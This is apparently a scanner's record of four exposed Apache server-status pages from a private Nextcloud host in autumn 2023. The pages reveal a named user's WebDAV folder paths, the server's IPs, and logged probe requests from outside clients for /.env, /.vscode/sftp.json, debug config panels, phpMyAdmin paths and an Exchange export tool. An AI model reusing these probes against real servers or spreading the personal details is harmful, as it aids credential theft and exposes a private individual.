1-395675500/18/964_ 3.3211301579630.00.136.53 165.232.76.155http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-395675500/16/923_ 3.3301391723590.00.1316.89 165.232.76.155http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-395675500/10/935_ 3.2202611599150.00.076.73 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/13/926_ 3.3301261603210.00.109.28 165.232.76.155http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-395675500/13/917_ 3.3401261593280.00.128.25 165.232.76.155http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-395675500/10/963_ 2.820911875410.00.089.80 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-395675501/15/940W 3.14001806580.00.106.53 165.232.76.155http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-395675500/22/894_ 3.25742381676650.00.1517.53 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/13/952_ 3.14998831780160.00.086.80 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/16/978_ 2.8869811870270.00.1022.87 185.117.37.101http/1.1ravignon.myclo
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbc495d115
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Sunday, 05-Nov-2023 20:50:50 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 36 Parent Server MPM Generation: 35 Server uptime: 30 days 17 hours 45 minutes 25 seconds Server load: 0.00 0.00 0.00 Total accesses: 38509 - Total Traffic: 506.0 MB - Total Duration: 42776472 CPU Usage: u86.73 s162.44 cu277.9 cs74.8 - .0227% CPU load .0145 requests/sec - 199 B/second - 13.5 kB/request - 1110.82 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1511798no0yes124000 2511799no0yes025000 Sum200 149000 .........................______________W________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0018894470589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0018894470543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0018894470545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0018894472564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0018894470488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0018894472513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0018894470606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0018894470573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.001889447210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0018894471626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0018894470549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.001889447139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0018894470555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0018894470496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00188944791555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0018894470602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0018894470517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0018894473458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0018894471558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0018894470578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0018894470582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0018894472678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0018894471634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0018894470627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0018894470572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-355117980/25/831_ 4.3242641485440.00.199.09 137.184.150.232h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-355117980/23/800_ 4.62114411422430.00.145.41 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-355117980/22/792_ 4.5221161440450.00.166.47 162.243.145.20http/1.1localhost:80MGLNDD_109.190.179.92_80\n 1-355117980/25/827_ 6.0822021701240.00.139.29 137.184.150.232http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-355117980/30/786_ 6.1011291333680.00.289.71 137.184.150.232http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-355117980/23/847_ 4.69421625640.00.1610.02 137.184.150.232h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-355117980/22/804_ 4.62144701390740.00.936.04 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-355117980/18/807_ 6.0011441491483300.00.097.26 71.6.134.235http/1.1localhost:80\x16\x03\x01 1-355117980/16/812_ 4.743501320430.00.1614.84 137.184.150.232http/1.1 1-355117980/26/802_ 6.0911601318230.00.2015.74 137.184.150.232http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-355117980/22/813_ 5.97016041621180.03.0318.35 35.83.254.73http/1.1ravignon.mycloud.paris:443GET /dist/core-common.js HTTP/1.1 1-355117980/20/799_ 6.1101371474870.00.1311.72 137.184.150.232http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-355117980/22/816_ 6.1111341478890.00.185.16 137.184.150.232http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-355117980/24/785_ 4.34021911200.00.145.20 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-355117981/26/808W 5.98001401330.00.8010.82 137.184.150.232http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-355117980/17/820_ 6.1101501340870.00.115.60 137.184.150.232http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-355117980/23/799_ 4.3614473811525400.00.1516.14 162.243.143.52http/1.1 1-355117980/21/806_ 6.0242381394480.00.155.86 137.184.150.232http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-355117980/16/777_ 5.98156321367940.00.098.38 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 1-355117980/26/786_ 5.99145221337710.00.287.47 141.98.11.60http/1.1localhost:80GET / HTTP/1.1 1-355117980/23/830_ 4.6215581661612940.00.197.24 162.243.141.15http/1.1ravignon.mycloud.paris:443GET /owa/auth/logon.aspx HTTP/1.1 1-355117980/24/798_ 4.36155821511080.00.195.66 54.36.115.221http/1.1 1-355117980/15/760_ 4.2821042611390700.00.1016.05 34.76.96.55http/1.1 1-355117980/23/810_ 4.6442721477300.00.216.01 35.83.254.73http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-355117980/15/853_ 4.69331704750.00.1022.15 137.184.150.232h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-355117990/14/421_ 3.082482752150.00.094.28 137.184.150.232http/1.1 2-355117990/13/400_ 3.119052642250.00.273.35 109.205.213.94http/1.1localhost:80GET / HTTP/1.1 2-355117990/20/410_ 3.1021032719040.00.1315.59 71.6.134.235
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb985ad9e3
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 26-Oct-2023 13:42:30 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 20 days 10 hours 37 minutes 5 seconds Server load: 0.04 0.02 0.00 Total accesses: 32628 - Total Traffic: 321.1 MB - Total Duration: 41975660 CPU Usage: u53.95 s108.25 cu236.22 cs62.95 - .0261% CPU load .0185 requests/sec - 190 B/second - 10.1 kB/request - 1286.49 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1325854no0yes124000 2325855no0yes025000 Sum200 149000 .........................________W______________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.009997480589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.009997480543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.009997480545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.009997482564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.009997480488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.009997482513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.009997480606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.009997480573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.00999748210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.009997481626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.009997480549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.00999748139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.009997480555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.009997480496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.0099974891555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.009997480602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.009997480517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.009997483458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.009997481558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.009997480578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.009997480582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.009997482678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.009997481634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.009997480627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.009997480572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-233258540/9/718_ 0.74526501300490.00.018.41 94.102.49.193http/1.1 1-233258540/13/703_ 0.74135501299050.00.114.81 203.177.89.28http/1.1localhost:80GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1 1-233258540/10/670_ 0.7453501279970.00.035.75 203.177.89.28http/1.1localhost:80GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1 1-233258540/8/707_ 0.74525801505600.00.035.47 94.102.49.193http/1.1 1-233258540/7/681_ 0.78330201173990.00.007.96 65.49.20.69http/1.1localhost:80\x16\x03\x01 1-233258540/12/739_ 0.73555201479320.00.088.38 203.177.89.28http/1.1localhost:80GET /mysql/pMA/index.php?lang=en HTTP/1.1 1-233258540/11/711_ 0.8453711288030.00.074.66 222.79.103.59http/1.1localhost:80GET / HTTP/1.1 1-233258540/12/710_ 0.74330201266970.00.056.06 203.177.89.28http/1.1localhost:80GET /admin/pma/index.php?lang=en HTTP/1.1 1-233258541/8/719W 0.75001181750.00.034.59 167.172.20.95http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-233258540/11/690_ 0.80259301174020.00.024.31 142.93.115.5http/1.1ravignon.mycloud.paris:443 1-233258540/12/716_ 0.74526401456390.00.044.68 94.102.49.193http/1.1 1-233258540/11/701_ 0.78526401295190.00.035.28 94.102.49.193http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-233258540/9/714_ 0.74259301370900.00.034.53 203.177.89.28http/1.1localhost:80GET /administrator/PMA/index.php?lang=en HTTP/1.1 1-233258540/11/689_ 0.751174201790730.00.034.47 203.177.89.28http/1.1localhost:80GET /phpmyadmin2015/index.php?lang=en HTTP/1.1 1-233258540/14/696_ 0.8213551921277890.00.079.42 34.76.158.233http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-233258540/7/716_ 0.7474701224650.00.015.05 107.170.237.74h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-233258540/9/696_ 0.78555201362330.00.035.10 165.22.47.52http/1.1ravignon.mycloud.paris:443 1-233258540/10/697_ 0.73888701231470.00.055.20 34.140.248.32http/1.1 1-233258540/6/690_ 0.731173701244220.00.007.81 203.177.89.28http/1.1localhost:80GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1 1-233258540/11/677_ 0.76888841215360.00.026.67 34.140.248.32http/1.1localhost:80GET / HTTP/1.1 1-233258540/9/718_ 0.78526501363940.00.014.89 94.102.49.193http/1.1localhost:80GET /.well-known/security.txt HTTP/1.1 1-233258540/11/693_ 0.751174201342180.00.054.95 203.177.89.28http/1.1localhost:80GET /phpMyAdmin4/index.php?lang=en HTTP/1.1 1-233258540/10/681_ 0.74201297210.00.035.96 167.172.20.95http/1.1 1-233258540/8/702_ 0.731033501353700.00.035.25 162.243.148.7http/1.1 1-233258540/9/759_ 0.731173701553470.00.0313.45 203.177.89.28http/1.1localhost:80GET /admin/index.php?lang=en HTTP/1.1 2-233258550/12/282_ 1.063250530410.00.062.47 167.172.20.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-233258550/15/268_ 1.467451486540.00.051.80 107.170.237.74http/1.1 2-233258550/14/280_ 1.232188552120.00.094.79 167.172.20.95http/1.1 2-233258550/12/275
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb3c5230e2
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Tuesday, 10-Oct-2023 22:10:43 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 4 days 19 hours 5 minutes 18 seconds Server load: 0.08 0.02 0.01 Total accesses: 8218 - Total Traffic: 79.5 MB - Total Duration: 1488616 CPU Usage: u29.85 s27.87 cu36.98 cs10.22 - .0253% CPU load .0198 requests/sec - 201 B/second - 9.9 kB/request - 181.141 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 056262no0yes025000 156263no0yes124000 Sum200 149000 ____________________________________________W_____.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4562620/46/153_ 9.0880327270610.00.241.11 51.158.173.226http/1.1 0-4562620/49/153_ 9.0911260190.00.591.26 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4562620/44/160_ 9.181106251710.00.271.26 128.199.61.251http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-4562620/42/144_ 9.076438205236570.00.350.96 146.190.156.64http/1.1 0-4562620/42/150_ 9.1010269490.00.241.04 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4562620/49/154_ 9.0910241600.01.772.43 92.184.96.192h2ravignon.mycloud.paris:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 0-4562620/50/161_ 9.0911272360.00.300.96 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4562620/47/162_ 8.9111042186269530.01.892.62 159.203.91.246http/1.1 0-4562620/56/167_ 9.1001326650.00.341.10 128.199.61.251http/1.1 0-4562620/43/155_ 8.931069983334020.00.961.61 208.100.26.236http/1.1 0-4562620/37/139_ 8.731069963277280.00.200.78 208.100.26.236http/1.1 0-4562620/40/151_ 8.91164241620.00.271.13 128.199.61.251http/1.1 0-4562620/45/145_ 9.00106990233040.00.240.80 208.100.26.236http/1.1 0-4562620/45/154_ 9.00106980219390.00.250.89 208.100.26.236http/1.1 0-4562620/43/152_ 8.601069957245460.00.252.30 208.100.26.236http/1.1 0-4562620/51/157_ 9.00106991311940.00.290.98 208.100.26.236http/1.1 0-4562620/44/160_ 9.001069879224730.00.282.70 208.100.26.236http/1.1 0-4562620/43/162_ 9.00106991232840.01.403.14 208.100.26.236http/1.1 0-4562620/42/147_ 8.791069867252890.00.231.13 208.100.26.236http/1.1 0-4562620/44/148_ 9.0210698216266190.00.281.00 208.100.26.236http/1.1 0-4562620/41/151_ 8.7610698168258030.00.831.62 208.100.26.236http/1.1 0-4562620/44/146_ 8.791069867234780.00.250.85 208.100.26.236http/1.1 0-4562620/47/154_ 9.05106984289327800.00.263.38 208.100.26.236http/1.1 0-4562620/45/169_ 8.776439144314380.00.241.20 146.190.156.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4562620/42/149_ 8.95643982303380.00.210.85 146.190.156.64http/1.1 1-4562630/73/172_ 13.8149980301230.00.381.72 193.35.18.187http/1.1localhost:80CONNECT google.com:443 HTTP/1.1 1-4562630/63/162_ 13.24297754316290.00.371.04 45.95.169.184http/1.1 1-4562630/49/155_ 13.5800311640.00.291.69 128.199.61.251http/1.1 1-4562630/69/180_ 13.630265446010.00.611.40 146.190.156.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4562630/63/181_ 13.8329771311360.03.394.14 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 1-4562630/55/178_ 13.20063390530.00.301.19 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4562630/76/189_ 13.6749980310080.00.471.19 193.35.18.187http/1.1 1-4562630/60/184_ 13.702977430319710.01.502.53 92.184.96.192h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4562630/80/187_ 13.88079295020.00.531.27 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-4562630/69/170_ 13.58099315990.00.341.06 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4562630/75/184_ 13.5312287800.00.461.11 128.199.61.251http/1.1 1-4562630/67/178_ 13.673593219368670.00.951.61 66.175.217.79http/1.1 1-4562630/70/186_ 13.87058312590.00.361.13 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-4562630/55/158_ 13.87071207570.00.421.12 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-4562630/62/182_ 13.6364391330700.00.321.08 146.190.156.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4562630/67/185_ 13.610129273040.00.411.19 92.184.96.192h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4562630/60/181_ 13.5800385800.00.641.40 92.184.96.192h2ravignon.mycloud.paris:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 1-4562630/60/164_ 13.88052322510.00.461.92 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-4562630/68/178_ 13.870149269680.01.562.27 128.199.61.251http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-4562631/56/166W 13.6300304480.01.532.58 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-4562630/61/164_ 13.6301278950.00.361.03 146.190.156.64h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4562630/73/177_ 13.51643987307150.00.411.04 146.190.156.64http/1.1 1-4562630/65/178_ 13.89052449880.01.592.82 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4562630/59/163_ 13.31162378770.01.041.73 128.199.61.251http/1.1 1-4562630/58/173_ 13.8315873263414010.00.323.15 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot SSL/TLS Session
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb873ace88
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Tuesday, 03-Oct-2023 13:40:21 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 230 Parent Server MPM Generation: 229 Server uptime: 206 days 7 hours 23 minutes 43 seconds Server load: 0.02 0.05 0.01 Total accesses: 312137 - Total Traffic: 4.2 GB - Total Duration: 58508170 CPU Usage: u543.12 s996.18 cu2037.84 cs603.52 - .0235% CPU load .0175 requests/sec - 253 B/second - 14.1 kB/request - 187.444 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03659793no0yes025000 13659794no1yes124001 Sum201 149001 ___________________________W______________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-22936597930/28/3087_ 6.841572088268650.00.1563.26 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/27/3149_ 6.83187745389960.00.1742.72 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/30/3144_ 6.822911965141580.00.1935.52 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-22936597930/37/3229_ 6.8129250980237090.00.2444.73 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-22936597930/24/3075_ 6.812931644747310.00.1548.09 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-22936597930/27/3138_ 6.641231434743100.00.1832.94 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-22936597930/43/3211_ 6.88972005067260.00.2741.02 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/29/3092_ 6.574221634750250.00.2040.85 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22936597930/29/3099_ 6.822912884606380.00.1733.02 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-22936597930/26/3151_ 6.43921374863740.00.1639.79 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22936597930/24/3120_ 6.65922045124320.01.2929.27 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/36/3172_ 6.79171685847740.00.2436.42 167.248.133.39h2cdone, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22936597930/28/3112_ 6.7991804946110.00.1743.82 159.65.138.217h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-22936597930/38/2990_ 6.822912294867710.00.2229.24 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-22936597930/37/3130_ 6.574221805052970.00.2254.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/29/3121_ 6.732861514984570.00.1829.52 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-22936597930/32/3178_ 6.621822005071810.00.2032.16 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/25/3044_ 6.812922384712560.00.1948.84 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-22936597930/28/3113_ 6.7612310364930450.00.1725.92 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22936597930/33/3113_ 6.751521464884040.00.2541.25 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-22936597930/30/3100_ 6.301821494993010.01.3747.79 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-22936597930/29/3156_ 6.732861515322760.00.1735.75 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22936597930/29/3190_ 6.831876355037970.00.1735.30 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22936597930/28/3046_ 6.871281734799950.00.1848.82 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-22936597930/33/3026_ 6.751521494619410.00.1946.64 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-22936597940/38/3244_ 9.1742845033330.00.2558.34 185.117.37.101http/1.1 1-22936597940/46/3198_ 9.680565085260.00.3258.93 159.65.138.217http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-22936597941/51/3272W 9.43005100150.00.3146.82 159.65.138.217http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-22936597940/46/3189_ 9.4483435115640.00.2747.40 159.65.138.217http/1.1 1-22936597940/33/3270_ 9.4215175133630.00.2442.18 159.65.138.217h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-22936597940/38/3220_ 9.4931405203930.00.2231.02 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-22936597940/40/3270_ 9.5811015075730.00.2738.75 159.65.138.217http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-22936597940/48/3353_ 9.57205394580.00.2942.60 167.248.133.39http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-22936597940/47/3356_ 9.6821365085450.01.1038.93 159.65.138.217http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config 